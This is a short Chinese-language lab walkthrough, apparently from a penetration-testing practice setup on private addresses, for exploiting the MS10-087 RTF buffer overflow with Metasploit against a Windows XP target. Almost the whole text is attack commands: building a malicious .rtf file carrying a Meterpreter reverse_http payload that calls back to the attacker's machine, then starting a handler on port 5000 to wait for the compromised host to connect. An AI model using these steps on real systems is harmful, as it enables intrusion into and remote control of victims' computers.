靶机:WIN XP 10.10.10.130
攻击机:BT5 10.10.10.128
一、进入msf终端并查找、调用ms10_087漏洞渗透代码
msfconsole search ms10_087 use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
二、设置参数生成.rtf文档并将文档copy到WIN XP靶机上
set payload windows/meterpreter/reverse_http #调用meterpreter的攻击载荷。反向连接到攻击机 set LHOST 10.10.10.128 set FILENAME ms10087.rtf exploit
三、设置侦听模块监听肉鸡上线
use exploit/multi/handler #使用侦听模块set LHOST 10.10.10.128 #设置本机ip set LPORT 5000 #设置本机监听的端口 exploit #进行渗透
之后再WIN XP上打开刚才的.rtf文件,等待肉鸡上线.....